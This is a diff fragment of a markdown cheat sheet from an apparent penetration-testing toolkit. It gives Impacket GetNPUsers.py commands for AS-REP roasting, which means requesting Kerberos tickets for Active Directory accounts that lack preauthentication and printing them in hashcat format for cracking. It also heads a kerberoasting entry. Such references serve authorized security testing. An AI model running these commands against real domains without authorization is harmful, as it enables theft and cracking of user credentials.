0xJam3z/armoury/armoury/data/cheats/Active_directory/Impacket/impacket-kerberos.md

 GetNPUsers.py <domain>/<user> -no-pass -request -format hashcat
 ```

-## GetNPUsers - attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ (ASREPRoasting)
+## GetNPUsers - attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' (ASREPRoasting)
 #plateform/linux #target/remote  #cat/ATTACK/EXPLOIT
 ```
-GetNPUsers.py -dc-ip <dc_ip> <domain>/ -usersfile <users_file> -format hashcat
+GetNPUsers.py -dc-ip <rhost> <domain>/ -usersfile <users.txt> -format hashcat
 ```

 ## GetUSERSPN - find Service Principal Names that are associated with a normal user account (kerberoasting)